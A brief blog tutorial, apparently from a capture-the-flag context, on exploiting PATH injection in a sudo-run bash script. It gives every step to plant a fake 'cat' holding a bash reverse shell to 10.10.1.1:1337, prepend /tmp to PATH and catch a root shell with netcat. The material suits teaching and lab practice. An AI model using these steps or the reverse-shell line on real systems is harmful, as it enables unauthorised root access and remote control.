Today’s post is on path injection. Let’s get started.
Identifying path injection vulnerability
There are many ways that may lead to path injection vulnerability. However, this post will only focus on path injection vulnerability in bash scripts.
Path injection vulnerability usually occurs if root users do not specify the full path of the file they would like to run. Let’s see the example below:
cmd$ sudo -l [sudo] password for soulx: User soulx may run the following commands on previse: (root) /home/soulx/vulscript.sh
#!/bin/bash cat /etc/shadow > /dev/null 2>&1
In this case, the
cat file/command was not specified with the full path. As such we can inject another path to the $PATH environment and let a malicious
cat file execute instead with root privilege.
Creating a malicious file
cmd$ nano /tmp/cat
Add the code below to the malicious
#!/bin/bash bash -i >& /dev/tcp/10.10.1.1/1337 0>&1
Remember to change the IP address to your own. After doing so, save the file.
Make it executable
After creating the file, we have to make sure it is executable by changing the permission.
cmd$ chmod 777 /tmp/cat
Modify $PATH environment
As we created the malicious file in the
/tmp directory, we will need to add it into the start of the $PATH so that /tmp directory will be searched 1st for
cmd$ export PATH="/tmp:$PATH"
Set a listening servicing
Before we exploit the vulnerable script, remember to set Netcat on your own system to listen at the port you have specified:
ownsys_cmd$ nc -lvnp 1337
Exploit the vulnerable script
We may now run the vulnerable script where our malicious
cat file will be executed instead.
cmd$ sudo /home/soulx/vulscript.sh
Your listening Netcat should receive an incoming connection and giving you a root shell!
I hope these tabs have been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂